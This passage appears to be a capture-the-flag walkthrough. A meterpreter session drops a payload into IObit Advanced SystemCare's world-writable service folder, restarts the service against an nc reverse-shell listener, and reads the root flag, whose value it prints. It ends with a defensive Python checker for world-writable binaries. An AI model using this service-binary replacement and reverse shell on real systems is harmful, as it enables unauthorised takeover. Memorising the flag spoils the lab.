040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:51 +0800 Database
100777/rwxrwxrwx 2172704 fil 2016-05-07 00:50:26 +0800 DefaultProgram.exe
100666/rw-rw-rw- 11220 fil 2016-02-23 02:18:02 +0800 DetectionEx.ini
100777/rwxrwxrwx 438560 fil 2016-01-12 04:30:04 +0800 DiskDefrag.exe
100666/rw-rw-rw- 607520 fil 2015-12-29 04:49:12 +0800 DiskMap.dll
100666/rw-rw-rw- 127776 fil 2016-07-21 00:15:44 +0800 DiskScan.dll
100777/rwxrwxrwx 72992 fil 2015-12-29 04:49:16 +0800 DiskScan.exe
100777/rwxrwxrwx 110368 fil 2016-01-12 09:54:36 +0800 Display.exe
100666/rw-rw-rw- 586 fil 2022-10-26 14:03:06 +0800 Display_log.txt
100666/rw-rw-rw- 14716 fil 2013-07-20 09:31:32 +0800 DownloadApplication.xml
100666/rw-rw-rw- 81539 fil 2016-01-08 05:10:46 +0800 EULA.rtf
100777/rwxrwxrwx 1221408 fil 2016-07-21 00:15:46 +0800 FeedBack.exe
100666/rw-rw-rw- 454432 fil 2015-12-29 05:06:54 +0800 FfSweep.dll
100777/rwxrwxrwx 4939536 fil 2019-09-26 23:18:20 +0800 FreeBigupgrade1211.exe
100777/rwxrwxrwx 1019680 fil 2015-12-29 05:10:30 +0800 Homepage.exe
100666/rw-rw-rw- 750880 fil 2016-01-21 09:23:28 +0800 HomepageSvc.dll
100666/rw-rw-rw- 387360 fil 2016-03-04 04:21:28 +0800 ICONPIN32.dll
100777/rwxrwxrwx 380192 fil 2016-03-04 04:21:30 +0800 ICONPIN32.exe
100666/rw-rw-rw- 614176 fil 2016-03-04 04:21:34 +0800 ICONPIN64.dll
100777/rwxrwxrwx 582944 fil 2016-03-04 04:21:36 +0800 ICONPIN64.exe
100777/rwxrwxrwx 9474336 fil 2016-07-09 05:42:24 +0800 IObitUninstaller.exe
100666/rw-rw-rw- 899872 fil 2016-07-21 00:15:50 +0800 InfoHelp.dll
100777/rwxrwxrwx 21280 fil 2016-03-10 07:56:44 +0800 Iobit_RefreshTaskBar.exe
100666/rw-rw-rw- 15 fil 2014-07-23 05:15:36 +0800 Lang.dat
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:42 +0800 Language
040777/rwxrwxrwx 4096 dir 2019-09-26 23:18:19 +0800 LatestNews
040777/rwxrwxrwx 4096 dir 2019-09-26 23:17:45 +0800 LinkImages
100777/rwxrwxrwx 2960672 fil 2016-07-21 00:15:54 +0800 LiveUpdate.exe
100666/rw-rw-rw- 768 fil 2019-09-26 23:17:49 +0800 LiveUpdate.log
100777/rwxrwxrwx 667424 fil 2015-12-29 04:49:32 +0800 LocalLang.exe
100777/rwxrwxrwx 1530656 fil 2016-07-21 00:15:56 +0800 Monitor.exe
100777/rwxrwxrwx 533792 fil 2015-12-29 04:49:38 +0800 MonitorDisk.exe
100777/rwxrwxrwx 2111776 fil 2016-04-30 02:12:52 +0800 MyWin10.exe
100777/rwxrwxrwx 569632 fil 2016-07-23 01:20:00 +0800 Nfeatures.exe
100777/rwxrwxrwx 116000 fil 2015-12-29 04:49:40 +0800 NoteIcon.exe
100666/rw-rw-rw- 48416 fil 2015-12-29 04:49:44 +0800 NtfsData.dll
100666/rw-rw-rw- 784160 fil 2016-07-21 00:16:04 +0800 OFCommon.dll
100777/rwxrwxrwx 918816 fil 2016-07-21 00:16:06 +0800 PPUninstaller.exe
100666/rw-rw-rw- 70432 fil 2015-12-29 04:49:52 +0800 PowerConfig.dll
100666/rw-rw-rw- 629536 fil 2015-12-29 04:49:58 +0800 ProductStatistics.dll
100777/rwxrwxrwx 1044256 fil 2016-07-28 02:24:26 +0800 QuickSettings.exe
100777/rwxrwxrwx 152352 fil 2015-12-29 04:50:18 +0800 ReProcess.exe
100777/rwxrwxrwx 719648 fil 2015-12-29 04:50:02 +0800 RealTimeProtector.exe
100777/rwxrwxrwx 2052896 fil 2016-05-10 04:22:08 +0800 Register.exe
100777/rwxrwxrwx 1094944 fil 2016-07-28 02:24:28 +0800 Reinforce.exe
100666/rw-rw-rw- 1406 fil 2019-09-26 23:18:14 +0800 Reinforce.log
100777/rwxrwxrwx 490272 fil 2016-01-05 05:44:00 +0800 Report.exe
100777/rwxrwxrwx 1723680 fil 2016-07-21 09:07:08 +0800 RescueCenter.exe
100777/rwxrwxrwx 1326504 fil 2015-12-26 03:55:20 +0800 SPInit.exe
100777/rwxrwxrwx 8383688 fil 2016-07-29 01:07:04 +0800 SPSetup.exe
100666/rw-rw-rw- 783136 fil 2015-12-29 04:45:54 +0800 SPUrlScanner.dll
100666/rw-rw-rw- 1293088 fil 2015-12-29 04:50:24 +0800 Scan.dll
100777/rwxrwxrwx 802592 fil 2016-04-27 05:00:24 +0800 ScreenShot.exe
100666/rw-rw-rw- 1024000 fil 2022-10-26 14:03:29 +0800 SecurityHoleScan.log
100777/rwxrwxrwx 1887520 fil 2016-07-21 00:16:18 +0800 SendBugReportNew.exe
100777/rwxrwxrwx 1720096 fil 2016-01-12 04:30:12 +0800 SoftUpdateTip.exe
100666/rw-rw-rw- 202 fil 2019-09-26 23:18:13 +0800 SpeedUp.log
100777/rwxrwxrwx 897824 fil 2015-12-29 04:50:46 +0800 StartupInfo.exe
100777/rwxrwxrwx 2630944 fil 2016-07-28 02:26:32 +0800 Suc11_RegistryCleaner.exe
100777/rwxrwxrwx 1179936 fil 2016-07-21 00:30:20 +0800 Suc12_DiskCleaner.exe
100777/rwxrwxrwx 561440 fil 2016-01-06 09:47:42 +0800 Suo10_SmartRAM.exe
100777/rwxrwxrwx 1767712 fil 2016-07-21 00:30:26 +0800 Suo11_InternetBooster.exe
100777/rwxrwxrwx 4190496 fil 2016-07-21 00:30:28 +0800 Suo12_StartupManager.exe
100777/rwxrwxrwx 1421088 fil 2016-05-07 00:50:38 +0800 Sur13_WinFix.exe
100666/rw-rw-rw- 82720 fil 2015-12-29 04:50:48 +0800 SysRest.dll
100777/rwxrwxrwx 607520 fil 2015-12-29 04:50:50 +0800 TaskHelper.exe
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:42 +0800 Toolbox_Language
100777/rwxrwxrwx 3360032 fil 2016-04-23 08:40:54 +0800 UninstallPromote.exe
040777/rwxrwxrwx 4096 dir 2019-09-27 16:32:33 +0800 Update
100666/rw-rw-rw- 8386 fil 2016-07-28 05:09:38 +0800 Update History.txt
100777/rwxrwxrwx 1355552 fil 2016-07-22 05:32:12 +0800 Wizard.exe
100666/rw-rw-rw- 1407264 fil 2015-12-29 04:49:04 +0800 cpuidsdk.dll
100666/rw-rw-rw- 72992 fil 2015-12-29 04:49:06 +0800 datastate.dll
100777/rwxrwxrwx 242464 fil 2015-12-29 04:49:08 +0800 delayLoad.exe
040777/rwxrwxrwx 4096 dir 2019-09-26 23:17:45 +0800 drivers
100666/rw-rw-rw- 5430 fil 2011-02-10 07:46:46 +0800 fav.ico
100666/rw-rw-rw- 190240 fil 2015-12-24 09:32:36 +0800 madbasic_.bpl
100666/rw-rw-rw- 57632 fil 2015-12-24 09:32:38 +0800 maddisAsm_.bpl
100666/rw-rw-rw- 355616 fil 2015-12-24 09:32:40 +0800 madexcept_.bpl
100777/rwxrwxrwx 1436448 fil 2015-12-29 04:50:10 +0800 repair task.exe
100666/rw-rw-rw- 1108256 fil 2015-12-24 09:32:44 +0800 rtl120.bpl
100666/rw-rw-rw- 227104 fil 2015-12-29 04:50:30 +0800 sdcore.dll
100666/rw-rw-rw- 117536 fil 2015-12-29 04:50:32 +0800 sdlib.dll
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:45 +0800 skin
100777/rwxrwxrwx 623904 fil 2016-07-26 01:01:12 +0800 smBootTime.exe
100666/rw-rw-rw- 694192 fil 2015-12-29 04:50:44 +0800 sqlite3.dll
100666/rw-rw-rw- 338720 fil 2015-12-29 04:50:52 +0800 taskmgr.dll
100666/rw-rw-rw- 119304 fil 2019-09-26 23:17:45 +0800 unins000.dat
100777/rwxrwxrwx 1208608 fil 2019-09-26 23:17:36 +0800 unins000.exe
100666/rw-rw-rw- 22701 fil 2019-09-26 23:17:45 +0800 unins000.msg
100666/rw-rw-rw- 2008864 fil 2015-12-24 09:32:46 +0800 vcl120.bpl
100666/rw-rw-rw- 222496 fil 2015-12-24 09:32:48 +0800 vclx120.bpl
100666/rw-rw-rw- 899872 fil 2015-12-29 04:50:58 +0800 webres.dll
100666/rw-rw-rw- 580 fil 2015-10-11 05:33:18 +0800 winid.dat
meterpreter > upload ~/Advanced.exe
[*] uploading : /home/zacarx/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /home/zacarx/Advanced.exe -> Advanced.exe
[*] uploaded : /home/zacarx/Advanced.exe -> Advanced.exe
meterpreter > ls
Listing: C:\Program Files (x86)\IObit\Advanced SystemCare
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 5091616 fil 2016-08-17 02:03:56 +0800 ASC.exe
100777/rwxrwxrwx 691488 fil 2015-12-29 04:48:34 +0800 ASCDownload.exe
100666/rw-rw-rw- 166176 fil 2015-12-29 04:47:32 +0800 ASCExtMenu.dll
100666/rw-rw-rw- 187680 fil 2015-12-29 04:47:30 +0800 ASCExtMenu_64.dll
100777/rwxrwxrwx 574240 fil 2016-03-04 08:16:34 +0800 ASCInit.exe
100666/rw-rw-rw- 743 fil 2019-09-26 23:17:50 +0800 ASCInit.log
100777/rwxrwxrwx 452384 fil 2016-07-26 01:01:08 +0800 ASCService.exe
100666/rw-rw-rw- 104270 fil 2022-10-26 15:12:56 +0800 ASCService.log
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:49 +0800 ASCServiceLog
100777/rwxrwxrwx 2023712 fil 2016-07-28 02:24:22 +0800 ASCTray.exe
100777/rwxrwxrwx 555808 fil 2015-12-29 05:06:42 +0800 ASCUpgrade.exe
100777/rwxrwxrwx 2400528 fil 2019-09-26 23:18:22 +0800 ASCVER.exe
100777/rwxrwxrwx 599328 fil 2015-12-29 04:48:46 +0800 AUpdate.exe
100666/rw-rw-rw- 64800 fil 2015-12-29 04:48:24 +0800 About.dll
100777/rwxrwxrwx 310560 fil 2016-07-28 02:24:20 +0800 About.exe
100666/rw-rw-rw- 21506 fil 2019-09-26 23:18:14 +0800 ActionCenter2.log
100777/rwxrwxrwx 2254624 fil 2016-01-08 09:13:48 +0800 ActionCenterDownloader.exe
100777/rwxrwxrwx 15872 fil 2022-10-26 15:16:17 +0800 Advanced.exe
100777/rwxrwxrwx 1917728 fil 2016-04-30 02:12:38 +0800 AutoCare.exe
100777/rwxrwxrwx 191264 fil 2015-12-29 04:52:24 +0800 AutoReactivator.exe
100777/rwxrwxrwx 1194784 fil 2016-04-30 02:12:40 +0800 AutoSweep.exe
100777/rwxrwxrwx 1403680 fil 2016-07-21 00:15:38 +0800 AutoUpdate.exe
100666/rw-rw-rw- 18536 fil 2019-09-27 16:32:33 +0800 AutoUpdate.log
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:46 +0800 Backup
100777/rwxrwxrwx 1063200 fil 2016-03-08 02:14:22 +0800 BrowserCleaner.exe
100666/rw-rw-rw- 131872 fil 2016-07-21 00:15:42 +0800 CPUIDInterface.dll
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:42 +0800 Config
100777/rwxrwxrwx 451872 fil 2015-12-29 04:49:22 +0800 DNSProtect.exe
100777/rwxrwxrwx 513528 fil 2016-04-13 04:10:24 +0800 Dashlane_Launcher.exe
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:51 +0800 Database
100777/rwxrwxrwx 2172704 fil 2016-05-07 00:50:26 +0800 DefaultProgram.exe
100666/rw-rw-rw- 11220 fil 2016-02-23 02:18:02 +0800 DetectionEx.ini
100777/rwxrwxrwx 438560 fil 2016-01-12 04:30:04 +0800 DiskDefrag.exe
100666/rw-rw-rw- 607520 fil 2015-12-29 04:49:12 +0800 DiskMap.dll
100666/rw-rw-rw- 127776 fil 2016-07-21 00:15:44 +0800 DiskScan.dll
100777/rwxrwxrwx 72992 fil 2015-12-29 04:49:16 +0800 DiskScan.exe
100777/rwxrwxrwx 110368 fil 2016-01-12 09:54:36 +0800 Display.exe
100666/rw-rw-rw- 586 fil 2022-10-26 14:03:06 +0800 Display_log.txt
100666/rw-rw-rw- 14716 fil 2013-07-20 09:31:32 +0800 DownloadApplication.xml
100666/rw-rw-rw- 81539 fil 2016-01-08 05:10:46 +0800 EULA.rtf
100777/rwxrwxrwx 1221408 fil 2016-07-21 00:15:46 +0800 FeedBack.exe
100666/rw-rw-rw- 454432 fil 2015-12-29 05:06:54 +0800 FfSweep.dll
100777/rwxrwxrwx 4939536 fil 2019-09-26 23:18:20 +0800 FreeBigupgrade1211.exe
100777/rwxrwxrwx 1019680 fil 2015-12-29 05:10:30 +0800 Homepage.exe
100666/rw-rw-rw- 750880 fil 2016-01-21 09:23:28 +0800 HomepageSvc.dll
100666/rw-rw-rw- 387360 fil 2016-03-04 04:21:28 +0800 ICONPIN32.dll
100777/rwxrwxrwx 380192 fil 2016-03-04 04:21:30 +0800 ICONPIN32.exe
100666/rw-rw-rw- 614176 fil 2016-03-04 04:21:34 +0800 ICONPIN64.dll
100777/rwxrwxrwx 582944 fil 2016-03-04 04:21:36 +0800 ICONPIN64.exe
100777/rwxrwxrwx 9474336 fil 2016-07-09 05:42:24 +0800 IObitUninstaller.exe
100666/rw-rw-rw- 899872 fil 2016-07-21 00:15:50 +0800 InfoHelp.dll
100777/rwxrwxrwx 21280 fil 2016-03-10 07:56:44 +0800 Iobit_RefreshTaskBar.exe
100666/rw-rw-rw- 15 fil 2014-07-23 05:15:36 +0800 Lang.dat
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:42 +0800 Language
040777/rwxrwxrwx 4096 dir 2019-09-26 23:18:19 +0800 LatestNews
040777/rwxrwxrwx 4096 dir 2019-09-26 23:17:45 +0800 LinkImages
100777/rwxrwxrwx 2960672 fil 2016-07-21 00:15:54 +0800 LiveUpdate.exe
100666/rw-rw-rw- 768 fil 2019-09-26 23:17:49 +0800 LiveUpdate.log
100777/rwxrwxrwx 667424 fil 2015-12-29 04:49:32 +0800 LocalLang.exe
100777/rwxrwxrwx 1530656 fil 2016-07-21 00:15:56 +0800 Monitor.exe
100777/rwxrwxrwx 533792 fil 2015-12-29 04:49:38 +0800 MonitorDisk.exe
100777/rwxrwxrwx 2111776 fil 2016-04-30 02:12:52 +0800 MyWin10.exe
100777/rwxrwxrwx 569632 fil 2016-07-23 01:20:00 +0800 Nfeatures.exe
100777/rwxrwxrwx 116000 fil 2015-12-29 04:49:40 +0800 NoteIcon.exe
100666/rw-rw-rw- 48416 fil 2015-12-29 04:49:44 +0800 NtfsData.dll
100666/rw-rw-rw- 784160 fil 2016-07-21 00:16:04 +0800 OFCommon.dll
100777/rwxrwxrwx 918816 fil 2016-07-21 00:16:06 +0800 PPUninstaller.exe
100666/rw-rw-rw- 70432 fil 2015-12-29 04:49:52 +0800 PowerConfig.dll
100666/rw-rw-rw- 629536 fil 2015-12-29 04:49:58 +0800 ProductStatistics.dll
100777/rwxrwxrwx 1044256 fil 2016-07-28 02:24:26 +0800 QuickSettings.exe
100777/rwxrwxrwx 152352 fil 2015-12-29 04:50:18 +0800 ReProcess.exe
100777/rwxrwxrwx 719648 fil 2015-12-29 04:50:02 +0800 RealTimeProtector.exe
100777/rwxrwxrwx 2052896 fil 2016-05-10 04:22:08 +0800 Register.exe
100777/rwxrwxrwx 1094944 fil 2016-07-28 02:24:28 +0800 Reinforce.exe
100666/rw-rw-rw- 1406 fil 2019-09-26 23:18:14 +0800 Reinforce.log
100777/rwxrwxrwx 490272 fil 2016-01-05 05:44:00 +0800 Report.exe
100777/rwxrwxrwx 1723680 fil 2016-07-21 09:07:08 +0800 RescueCenter.exe
100777/rwxrwxrwx 1326504 fil 2015-12-26 03:55:20 +0800 SPInit.exe
100777/rwxrwxrwx 8383688 fil 2016-07-29 01:07:04 +0800 SPSetup.exe
100666/rw-rw-rw- 783136 fil 2015-12-29 04:45:54 +0800 SPUrlScanner.dll
100666/rw-rw-rw- 1293088 fil 2015-12-29 04:50:24 +0800 Scan.dll
100777/rwxrwxrwx 802592 fil 2016-04-27 05:00:24 +0800 ScreenShot.exe
100666/rw-rw-rw- 1024000 fil 2022-10-26 14:03:29 +0800 SecurityHoleScan.log
100777/rwxrwxrwx 1887520 fil 2016-07-21 00:16:18 +0800 SendBugReportNew.exe
100777/rwxrwxrwx 1720096 fil 2016-01-12 04:30:12 +0800 SoftUpdateTip.exe
100666/rw-rw-rw- 202 fil 2019-09-26 23:18:13 +0800 SpeedUp.log
100777/rwxrwxrwx 897824 fil 2015-12-29 04:50:46 +0800 StartupInfo.exe
100777/rwxrwxrwx 2630944 fil 2016-07-28 02:26:32 +0800 Suc11_RegistryCleaner.exe
100777/rwxrwxrwx 1179936 fil 2016-07-21 00:30:20 +0800 Suc12_DiskCleaner.exe
100777/rwxrwxrwx 561440 fil 2016-01-06 09:47:42 +0800 Suo10_SmartRAM.exe
100777/rwxrwxrwx 1767712 fil 2016-07-21 00:30:26 +0800 Suo11_InternetBooster.exe
100777/rwxrwxrwx 4190496 fil 2016-07-21 00:30:28 +0800 Suo12_StartupManager.exe
100777/rwxrwxrwx 1421088 fil 2016-05-07 00:50:38 +0800 Sur13_WinFix.exe
100666/rw-rw-rw- 82720 fil 2015-12-29 04:50:48 +0800 SysRest.dll
100777/rwxrwxrwx 607520 fil 2015-12-29 04:50:50 +0800 TaskHelper.exe
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:42 +0800 Toolbox_Language
100777/rwxrwxrwx 3360032 fil 2016-04-23 08:40:54 +0800 UninstallPromote.exe
040777/rwxrwxrwx 4096 dir 2019-09-27 16:32:33 +0800 Update
100666/rw-rw-rw- 8386 fil 2016-07-28 05:09:38 +0800 Update History.txt
100777/rwxrwxrwx 1355552 fil 2016-07-22 05:32:12 +0800 Wizard.exe
100666/rw-rw-rw- 1407264 fil 2015-12-29 04:49:04 +0800 cpuidsdk.dll
100666/rw-rw-rw- 72992 fil 2015-12-29 04:49:06 +0800 datastate.dll
100777/rwxrwxrwx 242464 fil 2015-12-29 04:49:08 +0800 delayLoad.exe
040777/rwxrwxrwx 4096 dir 2019-09-26 23:17:45 +0800 drivers
100666/rw-rw-rw- 5430 fil 2011-02-10 07:46:46 +0800 fav.ico
100666/rw-rw-rw- 190240 fil 2015-12-24 09:32:36 +0800 madbasic_.bpl
100666/rw-rw-rw- 57632 fil 2015-12-24 09:32:38 +0800 maddisAsm_.bpl
100666/rw-rw-rw- 355616 fil 2015-12-24 09:32:40 +0800 madexcept_.bpl
100777/rwxrwxrwx 1436448 fil 2015-12-29 04:50:10 +0800 repair task.exe
100666/rw-rw-rw- 1108256 fil 2015-12-24 09:32:44 +0800 rtl120.bpl
100666/rw-rw-rw- 227104 fil 2015-12-29 04:50:30 +0800 sdcore.dll
100666/rw-rw-rw- 117536 fil 2015-12-29 04:50:32 +0800 sdlib.dll
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:45 +0800 skin
100777/rwxrwxrwx 623904 fil 2016-07-26 01:01:12 +0800 smBootTime.exe
100666/rw-rw-rw- 694192 fil 2015-12-29 04:50:44 +0800 sqlite3.dll
100666/rw-rw-rw- 338720 fil 2015-12-29 04:50:52 +0800 taskmgr.dll
100666/rw-rw-rw- 119304 fil 2019-09-26 23:17:45 +0800 unins000.dat
100777/rwxrwxrwx 1208608 fil 2019-09-26 23:17:36 +0800 unins000.exe
100666/rw-rw-rw- 22701 fil 2019-09-26 23:17:45 +0800 unins000.msg
100666/rw-rw-rw- 2008864 fil 2015-12-24 09:32:46 +0800 vcl120.bpl
100666/rw-rw-rw- 222496 fil 2015-12-24 09:32:48 +0800 vclx120.bpl
100666/rw-rw-rw- 899872 fil 2015-12-29 04:50:58 +0800 webres.dll
100666/rw-rw-rw- 580 fil 2015-10-11 05:33:18 +0800 winid.dat
meterpreter > shell
Process 2712 created.
Channel 8 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1056:
An instance of the service is already running.
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
First we set up a listener on the attacking machine:
nc -lnvp 4443
Then we start the service again:
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2384
FLAGS :
With that, the service has restarted under its own privileged account and we have root-level access, so the flag can be read:
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80
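The listing above is what makes this privilege escalation possible: the service's install directory contains executables and DLLs with mode 100777 (world-writable), so an unprivileged user can replace what the service loads and then restart it. As an added example (not part of the original post), the following Python parses listings in the format of meterpreter's `ls` output and flags world-writable binaries and directories, which is the check an administrator or auditor would run on a service directory. The sample listing embedded in the block is constructed for the example; the modes are chosen so that the checks have both hits and misses, and the names are taken from the kind of files shown above.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample in the layout of meterpreter's `ls` output
# (mode, size, type, mtime, name). Not the full listing from the post.
SAMPLE_LISTING = """\
100666/rw-rw-rw-  14716    fil  2013-07-20 09:31:32 +0800  DownloadApplication.xml
100777/rwxrwxrwx  1221408  fil  2016-07-21 00:15:46 +0800  FeedBack.exe
100666/rw-rw-rw-  454432   fil  2015-12-29 05:06:54 +0800  FfSweep.dll
100555/r-xr-xr-x  1436448  fil  2015-12-29 04:50:10 +0800  repair task.exe
040777/rwxrwxrwx  4096     dir  2019-09-26 23:17:45 +0800  drivers
"""

# One listing line: octal mode / symbolic perms, size, fil|dir, three-token
# timestamp, then the name (which may itself contain spaces).
LINE_RE = re.compile(
    r"^(?P<octal>\d{6})/(?P<perm>[rwx-]{9})\s+(?P<size>\d+)\s+(?P<kind>fil|dir)\s+"
    r"(?P<mtime>\S+ \S+ \S+)\s+(?P<name>.+?)\s*$"
)

# File types a service process will load and execute. A world-writable copy
# of any of these inside a service's directory is the weakness shown above.
BINARY_SUFFIXES = (".exe", ".dll", ".bpl", ".sys")


@dataclass
class Entry:
    perm: str
    size: int
    kind: str
    name: str

    @property
    def world_writable(self) -> bool:
        # perm is rwxrwxrwx-style; index 7 is the "others" write bit.
        return self.perm[7] == "w"

    @property
    def is_binary(self) -> bool:
        return self.kind == "fil" and self.name.lower().endswith(BINARY_SUFFIXES)


def parse_listing(text: str) -> List[Entry]:
    """Parse every line that matches the meterpreter `ls` layout; skip the rest."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers, blank lines, prompts
        entries.append(Entry(m["perm"], int(m["size"]), m["kind"], m["name"]))
    return entries


def world_writable_binaries(text: str) -> List[str]:
    """Executables/DLLs any local user could overwrite: the replace-and-restart risk."""
    return [e.name for e in parse_listing(text) if e.is_binary and e.world_writable]


def world_writable_dirs(text: str) -> List[str]:
    """Directories any local user could drop a new file into."""
    return [e.name for e in parse_listing(text) if e.kind == "dir" and e.world_writable]


if __name__ == "__main__":
    print("world-writable binaries:", world_writable_binaries(SAMPLE_LISTING))
    print("world-writable directories:", world_writable_dirs(SAMPLE_LISTING))
```

Run against a captured listing of a service's install directory, anything returned by `world_writable_binaries` should be fixed by restoring the vendor's intended ACL (no write access for Users) and, if a service binary could already have been swapped, by verifying its hash against a known-good copy. The `sc` output above shows the service was STOPPABLE by the shell user; combined with a writable binary that is the whole chain, so restricting who may stop and start the service is the second half of the fix.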